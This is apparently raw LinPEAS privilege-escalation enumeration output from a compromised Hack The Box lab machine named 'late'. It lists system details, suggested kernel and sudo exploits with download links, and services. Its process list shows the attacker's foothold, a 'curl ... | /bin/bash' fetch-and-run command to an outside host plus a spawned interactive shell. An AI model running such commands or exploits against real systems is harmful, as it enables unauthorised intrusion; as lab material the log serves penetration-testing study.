Linpeas Output
/---------------------------------------------------------------------------\
| Do you like PEASS? |
|---------------------------------------------------------------------------|
| Get latest LinPEAS : https://github.com/sponsors/carlospolop |
| Follow on Twitter : @carlospolopm |
| Respect on HTB : SirBroccoli |
|---------------------------------------------------------------------------|
| Thank you! |
\---------------------------------------------------------------------------/
linpeas-ng by carlospolop
ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner's permission.
Linux Privesc Checklist: https://book.hacktricks.xyz/linux-unix/linux-privilege-escalation-checklist
LEGEND:
RED/YELLOW: 95% a PE vector
RED: You should take a look to it
LightCyan: Users with console
Blue: Users without console & mounted devs
Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs)
LightMagenta: Your username
Starting linpeas. Caching Writable Folders...
                                        ╔═══════════════════╗
════════════════════════════════════════╣ Basic information ╠════════════════════════════════════════
                                        ╚═══════════════════╝
OS: Linux version 4.15.0-175-generic (buildd@lcy02-amd64-034) (gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04)) #184-Ubuntu SMP Thu Mar 24 17:48:36 UTC 2022
User & Groups: uid=1000(svc_acc) gid=1000(svc_acc) groups=1000(svc_acc)
Hostname: late
Writable folder: /dev/shm
[+] /bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h)
[+] /bin/nc is available for network discover & port scanning (linpeas can discover hosts and scan ports, learn more with -h)
Caching directories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . uniq: write error: Broken pipe
DONE
                                        ╔════════════════════╗
════════════════════════════════════════╣ System Information ╠═══════════════════════════════════════
                                        ╚════════════════════╝
╔══════════╣ Operative system
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#kernel-exploits
Linux version 4.15.0-175-generic (buildd@lcy02-amd64-034) (gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04)) #184-Ubuntu SMP Thu Mar 24 17:48:36 UTC 2022
Distributor ID: Ubuntu
Description: Ubuntu 18.04.5 LTS
Release: 18.04
Codename: bionic
╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version
Sudo version 1.8.21p2
╔══════════╣ CVEs Check
./linpeas.sh: 1192: ./linpeas.sh: [[: not found
./linpeas.sh: 1192: ./linpeas.sh: rpm: not found
./linpeas.sh: 1192: ./linpeas.sh: 0: not found
./linpeas.sh: 1202: ./linpeas.sh: [[: not found
╔══════════╣ PATH
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-path-abuses
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
New path exported: /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
╔══════════╣ Date & uptime
Fri Apr 29 20:18:39 UTC 2022
20:18:39 up 8:40, 0 users, load average: 0.32, 0.11, 0.03
╔══════════╣ Any sd*/disk* disk in /dev? (limit 20)
disk
sda
sda1
sda2
sda3
╔══════════╣ Unmounted file-system?
╚ Check if you can mount unmounted devices
/dev/disk/by-id/dm-uuid-LVM-K9sID5HS0BioNF3Nf78PEj64ogIbQQFYkm5vYyFQujYnKhx8wEg3NbTLdurdYyxv / ext4 defaults 0 0
/dev/disk/by-uuid/9c799abd-020e-4aff-bd5d-ca3e16b032cb /boot ext4 defaults 0 0
/dev/mapper/ubuntu--vg-swap none swap sw 0 0
╔══════════╣ Environment
╚ Any private information inside environment variables?
LESSOPEN=| /usr/bin/lesspipe %s
HISTFILESIZE=0
USER=svc_acc
SHLVL=3
HOME=/home/svc_acc
OLDPWD=/home/svc_acc/app
LOGNAME=svc_acc
JOURNAL_STREAM=9:21747
_=./linpeas.sh
SERVER_SOFTWARE=gunicorn/20.1.0
TERM=xterm
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
INVOCATION_ID=becce0d27d5d457e9b4347711884ce9c
LANG=en_US.UTF-8
HISTSIZE=0
LS_COLORS=
SHELL=/bin/bash
LESSCLOSE=/usr/bin/lesspipe %s %s
PWD=/home/svc_acc
HISTFILE=/dev/null
╔══════════╣ Searching Signature verification failed in dmesg
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#dmesg-signature-verification-failed
dmesg Not Found
╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
[+] [CVE-2021-4034] PwnKit
Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
Exposure: probable
Tags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaro
Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main
[+] [CVE-2021-3156] sudo Baron Samedit
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
Exposure: probable
Tags: mint=19,[ ubuntu=18|20 ], debian=10
Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main
[+] [CVE-2021-3156] sudo Baron Samedit 2
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
Exposure: probable
Tags: centos=6|7|8,[ ubuntu=14|16|17|18|19|20 ], debian=9|10
Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
[+] [CVE-2018-18955] subuid_shell
Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1712
Exposure: probable
Tags: [ ubuntu=18.04 ]{kernel:4.15.0-20-generic},fedora=28{kernel:4.16.3-301.fc28}
Download URL: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45886.zip
Comments: CONFIG_USER_NS needs to be enabled
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
Exposure: less probable
Tags: ubuntu=20.04{kernel:5.8.0-*}
Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
Comments: ip_tables kernel module must be loaded
[+] [CVE-2019-18634] sudo pwfeedback
Details: https://dylankatz.com/Analysis-of-CVE-2019-18634/
Exposure: less probable
Tags: mint=19
Download URL: https://github.com/saleemrashid/sudo-cve-2019-18634/raw/master/exploit.c
Comments: sudo configuration requires pwfeedback to be enabled.
[+] [CVE-2019-15666] XFRM_UAF
Details: https://duasynt.com/blog/ubuntu-centos-redhat-privesc
Exposure: less probable
Download URL:
Comments: CONFIG_USER_NS needs to be enabled; CONFIG_XFRM needs to be enabled
[+] [CVE-2017-5618] setuid screen v4.5.0 LPE
Details: https://seclists.org/oss-sec/2017/q1/184
Exposure: less probable
Download URL: https://www.exploit-db.com/download/https://www.exploit-db.com/exploits/41154
[+] [CVE-2017-0358] ntfs-3g-modprobe
Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1072
Exposure: less probable
Tags: ubuntu=16.04{ntfs-3g:2015.3.14AR.1-1build1},debian=7.0{ntfs-3g:2012.1.15AR.5-2.1+deb7u2},debian=8.0{ntfs-3g:2014.2.15AR.2-1+deb8u2}
Download URL: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41356.zip
Comments: Distros use own versioning scheme. Manual verification needed. Linux headers must be installed. System must have at least two CPU cores.
╔══════════╣ Executing Linux Exploit Suggester 2
╚ https://github.com/jondonas/linux-exploit-suggester-2
╔══════════╣ Protections
╚═╣ AppArmor enabled? .............. You do not have enough privilege to read the profile set.
apparmor module is loaded.
╚═╣ grsecurity present? ............ grsecurity Not Found
╚═╣ PaX bins present? .............. PaX Not Found
╚═╣ Execshield enabled? ............ Execshield Not Found
╚═╣ SELinux enabled? ............... sestatus Not Found
╚═╣ Is ASLR enabled? ............... Yes
╚═╣ Printer? ....................... No
╚═╣ Is this a virtual machine? ..... Yes (vmware)
                                            ╔═══════════╗
════════════════════════════════════════════╣ Container ╠═══════════════════════════════════════════
                                            ╚═══════════╝
╔══════════╣ Container related tools present
/usr/bin/lxc
╔══════════╣ Container details
╚═╣ Is this a container? ........... No
╚═╣ Any running containers? ........ No
                          ╔════════════════════════════════════════════════╗
══════════════════════════╣ Processes, Crons, Timers, Services and Sockets ╠═════════════════════════
                          ╚════════════════════════════════════════════════╝
╔══════════╣ Cleaned processes
╚ Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes
root 1 0.0 0.4 159720 8748 ? Ss 11:38 0:03 /sbin/init maybe-ubiquity
root 531 0.0 0.5 95536 12088 ? S<s 11:38 0:01 /lib/systemd/systemd-journald
root 538 0.0 0.0 105912 1956 ? Ss 11:38 0:00 /sbin/lvmetad -f
root 561 0.0 0.2 46608 5196 ? Ss 11:38 0:00 /lib/systemd/systemd-udevd
systemd+ 619 0.0 0.1 145972 3220 ? Ssl 11:38 0:02 /lib/systemd/systemd-timesyncd
└─(Caps) 0x0000000002000000=cap_sys_time
root 706 0.0 0.4 89872 9932 ? Ss 11:38 0:00 /usr/bin/VGAuthService
root 708 0.0 0.3 225736 7656 ? S<sl 11:38 0:28 /usr/bin/vmtoolsd
systemd+ 823 0.0 0.2 71732 5136 ? Ss 11:38 0:00 /lib/systemd/systemd-networkd
└─(Caps) 0x0000000000003c00=cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw
systemd+ 852 0.0 0.2 70500 5128 ? Ss 11:38 0:01 /lib/systemd/systemd-resolved
root 989 0.0 0.3 286260 6896 ? Ssl 11:38 0:00 /usr/lib/accountsservice/accounts-daemon
avahi 1026 0.0 0.0 47084 336 ? S 11:38 0:00 _ avahi-daemon: chroot helper
root 998 0.0 0.4 434332 9656 ? Ssl 11:38 0:00 /usr/sbin/ModemManager --filter-policy=strict
root 1032 0.0 0.8 169104 17232 ? Ssl 11:38 0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
daemon 1033 0.0 0.1 28340 2500 ? Ss 11:38 0:00 /usr/sbin/atd -f
root 1036 0.0 0.1 30036 3292 ? Ss 11:38 0:00 /usr/sbin/cron -f
message+ 1038 0.0 0.2 50368 4740 ? Ss 11:38 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
└─(Caps) 0x0000000020000000=cap_audit_write
root 1084 0.0 0.2 45240 5412 ? Ss 11:38 0:00 /sbin/wpa_supplicant -u -s -O /run/wpa_supplicant
root 1091 0.0 0.1 383336 2372 ? Ssl 11:38 0:00 /usr/bin/lxcfs /var/lib/lxcfs/
root 1099 0.0 0.1 110556 2072 ? Ssl 11:38 0:01 /usr/sbin/irqbalance --foreground
root 1100 0.0 0.2 70476 5880 ? Ss 11:38 0:00 /lib/systemd/systemd-logind
syslog 1101 0.0 0.2 263044 4548 ? Ssl 11:38 0:00 /usr/sbin/rsyslogd -n
root 1102 0.0 0.7 405500 16092 ? Ssl 11:38 0:04 /usr/sbin/NetworkManager --no-daemon
root 1131 0.0 0.3 288888 6608 ? Ssl 11:38 0:00 /usr/lib/policykit-1/polkitd --no-debug
svc_acc 1212 0.0 1.1 60704 22788 ? Ss 11:38 0:06 /usr/bin/python3 /usr/local/bin/gunicorn --workers 3 wsgi:app
svc_acc 1516 0.0 1.7 107036 36316 ? S 11:38 0:07 _ /usr/bin/python3 /usr/local/bin/gunicorn --workers 3 wsgi:app
svc_acc 7818 0.0 1.5 101340 32648 ? S 19:17 0:00 _ /usr/bin/python3 /usr/local/bin/gunicorn --workers 3 wsgi:app
svc_acc 8716 0.2 1.5 101084 32344 ? S 20:17 0:00 _ /usr/bin/python3 /usr/local/bin/gunicorn --workers 3 wsgi:app
root 1242 0.0 0.0 141720 1576 ? Ss 11:38 0:00 nginx: master process /usr/sbin/nginx -g daemon on; master_process on;
www-data 1243 0.1 0.3 144016 7072 ? S 11:38 0:37 _ nginx: worker process
www-data 1244 0.0 0.3 144016 7072 ? S 11:38 0:11 _ nginx: worker process
root 1325 0.0 0.3 72308 6628 ? Ss 11:38 0:00 /usr/sbin/sshd -D
root 1330 0.0 0.0 14896 1968 tty1 Ss+ 11:38 0:00 /sbin/agetty -o -p -- u --noclear tty1 linux
root 1483 0.0 0.2 124840 4512 ? Ss 11:38 0:01 sendmail: MTA: accepting connections
svc_acc 8678 0.0 0.0 4636 816 ? S 20:16 0:00 /bin/sh -c curl http://10.10.14.17/hi | /bin/bash
svc_acc 8680 0.0 0.1 11600 3244 ? S 20:16 0:00 _ /bin/bash
svc_acc 8681 0.0 0.2 21244 4904 ? S 20:16 0:00 _ /bin/bash -i
svc_acc 8705 0.0 0.4 39096 9740 ? S 20:17 0:00 _ python3 -c import pty;pty.spawn("/bin/bash");
svc_acc 8706 0.0 0.2 21476 5364 pts/0 Ss 20:17 0:00 _ /bin/bash
svc_acc 8994 0.5 0.1 5744 2892 pts/0 S+ 20:18 0:00 _ /bin/sh ./linpeas.sh
svc_acc 12110 0.0 0.0 5744 1136 pts/0 S+ 20:18 0:00 _ /bin/sh ./linpeas.sh
svc_acc 12114 0.0 0.1 38704 3980 pts/0 R+ 20:18 0:00 | _ ps fauxwww
svc_acc 12113 0.0 0.0 5744 1136 pts/0 S+ 20:18 0:00 _ /bin/sh ./linpeas.sh
╔══════════╣ Binary processes permissions (non 'root root' and not belonging to current user)
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes
╔══════════╣ Files opened by processes belonging to other users
╚ This is usually empty because of the lack of privileges to read other user processes information
COMMAND PID TID USER FD TYPE DEVICE SIZE/OFF NODE NAME
╔══════════╣ Processes with credentials in memory (root req)
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#credentials-from-process-memory
gdm-password Not Found
gnome-keyring-daemon Not Found
lightdm Not Found
vsftpd Not Found
apache2 Not Found
sshd Not Found
╔══════════╣ Cron jobs
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#scheduled-cron-jobs
/usr/bin/crontab
incrontab Not Found
-rw-r--r-- 1 root root 722 Nov 16 2017 /etc/crontab
/etc/cron.d:
total 32
drwxr-xr-x 2 root root 4096 Apr 7 13:51 .
drwxr-xr-x 121 root root 12288 Apr 18 12:05 ..
-rw-r--r-- 1 root root 589 Jan 14 2020 mdadm
-rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder
-rw-r--r-- 1 root root 191 Aug 6 2020 popularity-contest
-rw-r--r-- 1 root root 2466 Jan 14 10:20 sendmail
/etc/cron.daily:
total 76
drwxr-xr-x 2 root root 4096 Apr 7 13:51 .
drwxr-xr-x 121 root root 12288 Apr 18 12:05 ..
-rwxr-xr-x 1 root root 376 Nov 11 2019 apport
-rwxr-xr-x 1 root root 1478 Apr 20 2018 apt-compat
-rwxr-xr-x 1 root root 355 Dec 29 2017 bsdmainutils
-rwxr-xr-x 1 root root 384 Dec 12 2012 cracklib-runtime
-rwxr-xr-x 1 root root 1176 Nov 2 2017 dpkg
-rwxr-xr-x 1 root root 372 Aug 21 2017 logrotate
-rwxr-xr-x 1 root root 1065 Apr 7 2018 man-db
-rwxr-xr-x 1 root root 539 Jan 14 2020 mdadm
-rwxr-xr-x 1 root root 538 Mar 1 2018 mlocate
-rwxr-xr-x 1 root root 249 Jan 25 2018 passwd
-rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder
-rwxr-xr-x 1 root root 3477 Feb 21 2018 popularity-contest
-rwxr-xr-x 1 root root 3302 Jan 13 2018 sendmail
-rwxr-xr-x 1 root root 246 Mar 21 2018 ubuntu-advantage-tools
-rwxr-xr-x 1 root root 214 Nov 12 2018 update-notifier-common
/etc/cron.hourly:
total 20
drwxr-xr-x 2 root root 4096 Apr 7 13:51 .
drwxr-xr-x 121 root root 12288 Apr 18 12:05 ..
-rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder
/etc/cron.monthly:
total 20
drwxr-xr-x 2 root root 4096 Apr 7 13:51 .
drwxr-xr-x 121 root root 12288 Apr 18 12:05 ..
-rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder
/etc/cron.weekly:
total 28
drwxr-xr-x 2 root root 4096 Apr 7 13:51 .
drwxr-xr-x 121 root root 12288 Apr 18 12:05 ..
-rwxr-xr-x 1 root root 723 Apr 7 2018 man-db
-rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder
-rwxr-xr-x 1 root root 403 Aug 23 2021 update-notifier-common
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
╔══════════╣ Systemd PATH
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#systemd-path-relative-paths
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
╔══════════╣ Analyzing .service files
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#services
/etc/systemd/system/multi-user.target.wants/networking.service is executing some relative path
/etc/systemd/system/network-online.target.wants/networking.service is executing some relative path
╔══════════╣ System timers
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#timers
NEXT LEFT LAST PASSED UNIT ACTIVATES
Fri 2022-04-29 22:30:43 UTC 2h 11min left Fri 2022-04-29 11:54:35 UTC 8h ago motd-news.timer motd-news.service
Sat 2022-04-30 06:42:42 UTC 10h left Fri 2022-04-29 11:38:37 UTC 8h ago apt-daily-upgrade.timer apt-daily-upgrade.service
Sat 2022-04-30 07:06:08 UTC 10h left Fri 2022-04-29 19:30:59 UTC 47min ago apt-daily.timer apt-daily.service
Sat 2022-04-30 11:53:43 UTC 15h left Fri 2022-04-29 11:53:43 UTC 8h ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
Mon 2022-05-02 00:00:00 UTC 2 days left Fri 2022-04-29 11:38:37 UTC 8h ago fstrim.timer fstrim.service
n/a n/a n/a n/a ureadahead-stop.timer ureadahead-stop.service
╔══════════╣ Analyzing .timer files
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#timers
╔══════════╣ Analyzing .socket files
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets
/etc/systemd/system/cloud-init.target.wants/cloud-init-hotplugd.socket is calling this writable listener: /run/cloud-init/hook-hotplug-cmd
/etc/systemd/system/sockets.target.wants/avahi-daemon.socket is calling this writable listener: /run/avahi-daemon/socket
/etc/systemd/system/sockets.target.wants/uuidd.socket is calling this writable listener: /run/uuidd/request
/lib/systemd/system/avahi-daemon.socket is calling this writable listener: /run/avahi-daemon/socket
/lib/systemd/system/cloud-init-hotplugd.socket is calling this writable listener: /run/cloud-init/hook-hotplug-cmd
/lib/systemd/system/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket
/lib/systemd/system/sockets.target.wants/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket
/lib/systemd/system/sockets.target.wants/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log
/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout
/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket
/lib/systemd/system/syslog.socket is calling this writable listener: /run/systemd/journal/syslog
/lib/systemd/system/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log
/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout
/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket
/lib/systemd/system/uuidd.socket is calling this writable listener: /run/uuidd/request
╔══════════╣ Unix Sockets Listening
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets
/run/acpid.socket
└─(Read Write)
/run/avahi-daemon/socket
└─(Read Write)
/run/dbus/system_bus_socket
└─(Read Write)
/run/lvm/lvmetad.socket
/run/lvm/lvmpolld.socket
/run/sendmail/mta/smcontrol
/run/systemd/journal/dev-log
└─(Read Write)
/run/systemd/journal/socket
└─(Read Write)
/run/systemd/journal/stdout
└─(Read Write)
/run/systemd/journal/syslog
└─(Read Write)
/run/systemd/notify
└─(Read Write)
/run/systemd/private
└─(Read Write)
/run/udev/control
/run/uuidd/request
└─(Read Write)
/run/vmware/guestServicePipe
└─(Read Write)
/var/lib/lxd/unix.socket
/var/run/dbus/system_bus_socket
└─(Read Write)
/var/run/sendmail/mta/smcontrol
/var/run/vmware/guestServicePipe
└─(Read Write)
╔══════════╣ D-Bus config files
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#d-bus
Possible weak user policy found on /etc/dbus-1/system.d/avahi-dbus.conf ( <policy user="avahi">)
Possible weak user policy found on /etc/dbus-1/system.d/avahi-dbus.conf ( <policy group="netdev">)
Possible weak user policy found on /etc/dbus-1/system.d/bluetooth.conf ( <policy group="bluetooth">
<policy group="lp">)
Possible weak user policy found on /etc/dbus-1/system.d/dnsmasq.conf ( <policy user="dnsmasq">)
Possible weak user policy found on /etc/dbus-1/system.d/net.hadess.SensorProxy.conf ( <policy user="geoclue">)
Possible weak user policy found on /etc/dbus-1/system.d/org.freedesktop.ColorManager.conf ( <policy user="colord">)
Possible weak user policy found on /etc/dbus-1/system.d/org.freedesktop.GeoClue2.Agent.conf ( <policy user="geoclue">)
Possible weak user policy found on /etc/dbus-1/system.d/org.freedesktop.GeoClue2.conf ( <policy user="geoclue">)
Possible weak user policy found on /etc/dbus-1/system.d/org.freedesktop.NetworkManager.conf ( <policy user="whoopsie">)
Possible weak user policy found on /etc/dbus-1/system.d/org.freedesktop.RealtimeKit1.conf ( <policy user="rtkit">)
Possible weak user policy found on /etc/dbus-1/system.d/org.freedesktop.thermald.conf ( <policy group="power">)
Possible weak user policy found on /etc/dbus-1/system.d/org.opensuse.CupsPkHelper.Mechanism.conf ( <policy user="cups-pk-helper">)
Possible weak user policy found on /etc/dbus-1/system.d/pulseaudio-system.conf ( <policy user="pulse">)
Possible weak user policy found on /etc/dbus-1/system.d/wpa_supplicant.conf ( <policy group="netdev">)
╔══════════╣ D-Bus Service Objects list
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#d-bus
NAME PID PROCESS USER CONNECTION UNIT SESSION DESCRIPTION
:1.0 1 systemd root :1.0 init.scope - -
:1.1 852 systemd-resolve systemd-resolve :1.1 systemd-resolved.service - -
:1.10 1102 NetworkManager root :1.10 NetworkManager.service - -
:1.11 1032 networkd-dispat root :1.11 networkd-dispatcher.se…ce - -
:1.115 15144 busctl svc_acc :1.115 web-app.service - -
:1.2 823 systemd-network systemd-network :1.2 systemd-networkd.service - -
:1.3 998 ModemManager root :1.3 ModemManager.service - -
:1.4 995 avahi-daemon avahi :1.4 avahi-daemon.service - -
:1.6 989 accounts-daemon root :1.6 accounts-daemon.service - -
:1.7 1084 wpa_supplicant root :1.7 wpa_supplicant.service - -
:1.8 1100 systemd-logind root :1.8 systemd-logind.service - -
:1.9 1131 polkitd root :1.9 polkit.service - -
com.ubuntu.LanguageSelector - - - (activatable) - -
com.ubuntu.SoftwareProperties - - - (activatable) - -
com.ubuntu.SystemService - - - (activatable) - -
com.ubuntu.WhoopsiePreferences - - - (activatable) - -
fi.epitest.hostap.WPASupplicant 1084 wpa_supplicant root :1.7 wpa_supplicant.service - -
fi.w1.wpa_supplicant1 1084 wpa_supplicant root :1.7 wpa_supplicant.service - -
org.bluez - - - (activatable) - -
org.debian.apt - - - (activatable) - -
org.freedesktop.Accounts 989 accounts-daemon root :1.6 accounts-daemon.service - -
org.freedesktop.Avahi 995 avahi-daemon avahi :1.4 avahi-daemon.service - -
org.freedesktop.ColorManager - - - (activatable) - -
org.freedesktop.DBus 1 systemd root - init.scope - -
org.freedesktop.GeoClue2 - - - (activatable) - -
org.freedesktop.ModemManager1 998 ModemManager root :1.3 ModemManager.service - -
org.freedesktop.NetworkManager 1102 NetworkManager root :1.10 NetworkManager.service - -
org.freedesktop.PackageKit - - - (activatable) - -
org.freedesktop.PolicyKit1 1131 polkitd root :1.9 polkit.service - -
org.freedesktop.RealtimeKit1 - - - (activatable) - -
org.freedesktop.UPower - - - (activatable) - -
org.freedesktop.hostname1 - - - (activatable) - -
org.freedesktop.locale1 - - - (activatable) - -
org.freedesktop.login1 1100 systemd-logind root :1.8 systemd-logind.service - -
org.freedesktop.network1 823 systemd-network systemd-network :1.2 systemd-networkd.service - -
org.freedesktop.nm_dispatcher - - - (activatable) - -
org.freedesktop.resolve1 852 systemd-resolve systemd-resolve :1.1 systemd-resolved.service - -
org.freedesktop.systemd1 1 systemd root :1.0 init.scope - -
org.freedesktop.thermald - - - (activatable) - -
org.freedesktop.timedate1 - - - (activatable) - -
org.opensuse.CupsPkHelper.Mechanism - - - (activatable) - -
                                       ╔═════════════════════╗
═══════════════════════════════════════╣ Network Information ╠═══════════════════════════════════════
                                       ╚═════════════════════╝
╔══════════╣ Hostname, hosts and DNS
late
127.0.0.1 localhost.localdomain localhost late late.htb
127.0.0.1 late
::1 ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
1.1.1.1
localdomain
╔══════════╣ Interfaces
# symbolic names for networks, see networks(5) for more information
link-local 169.254.0.0
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.11.156 netmask 255.255.254.0 broadcast 10.10.11.255
inet6 dead:beef::250:56ff:feb9:6da0 prefixlen 64 scopeid 0x0<global>
inet6 fe80::250:56ff:feb9:6da0 prefixlen 64 scopeid 0x20<link>
ether 00:50:56:b9:6d:a0 txqueuelen 1000 (Ethernet)
RX packets 494481 bytes 85527453 (85.5 MB)
RX errors 0 dropped 155 overruns 0 frame 0
TX packets 450072 bytes 170915293 (170.9 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 85403 bytes 20924303 (20.9 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 85403 bytes 20924303 (20.9 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8000 0.0.0.0:* LISTEN 1212/python3
tcp 0 0 127.0.0.1:587 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
╔══════════╣ Can I sniff with tcpdump?
No
                                        ╔═══════════════════╗
════════════════════════════════════════╣ Users Information ╠════════════════════════════════════════
                                        ╚═══════════════════╝
╔══════════╣ My user
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#users
uid=1000(svc_acc) gid=1000(svc_acc) groups=1000(svc_acc)
╔══════════╣ Do I have PGP keys?
/usr/bin/gpg
netpgpkeys Not Found
netpgp Not Found
╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
╔══════════╣ Checking sudo tokens
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#reusing-sudo-tokens
ptrace protection is enabled (1)
gdb wasn't found in PATH, this might still be vulnerable but linpeas won't be able to check it
╔══════════╣ Checking Pkexec policy
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation/interesting-groups-linux-pe#pe-method-2
[Configuration]
AdminIdentities=unix-user:0
[Configuration]
AdminIdentities=unix-group:sudo;unix-group:admin
╔══════════╣ Superusers
root:x:0:0:root:/root:/bin/bash
╔══════════╣ Users with console
root:x:0:0:root:/root:/bin/bash
svc_acc:x:1000:1000:Service Account:/home/svc_acc:/bin/bash
╔══════════╣ All users & groups
uid=0(root) gid=0(root) groups=0(root)
uid=1000(svc_acc) gid=1000(svc_acc) groups=1000(svc_acc)
uid=100(systemd-network) gid=102(systemd-network) groups=102(systemd-network)
uid=101(systemd-resolve) gid=103(systemd-resolve) groups=103(systemd-resolve)
uid=102(syslog) gid=106(syslog) groups=106(syslog),4(adm)
uid=103(messagebus) gid=107(messagebus) groups=107(messagebus)
uid=104(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=105(lxd) gid=65534(nogroup) groups=65534(nogroup)
uid=106(uuidd) gid=110(uuidd) groups=110(uuidd)
uid=107(dnsmasq) gid=65534(nogroup) groups=65534(nogroup)
uid=108(landscape) gid=112(landscape) groups=112(landscape)
uid=109(pollinate) gid=1(daemon) groups=1(daemon)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=110(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=111(rtkit) gid=114(rtkit) groups=114(rtkit)
uid=112(usbmux) gid=46(plugdev) groups=46(plugdev)
uid=113(avahi) gid=116(avahi) groups=116(avahi)
uid=114(cups-pk-helper) gid=117(lpadmin) groups=117(lpadmin)
uid=115(saned) gid=119(saned) groups=119(saned),118(scanner)
uid=116(colord) gid=120(colord) groups=120(colord)
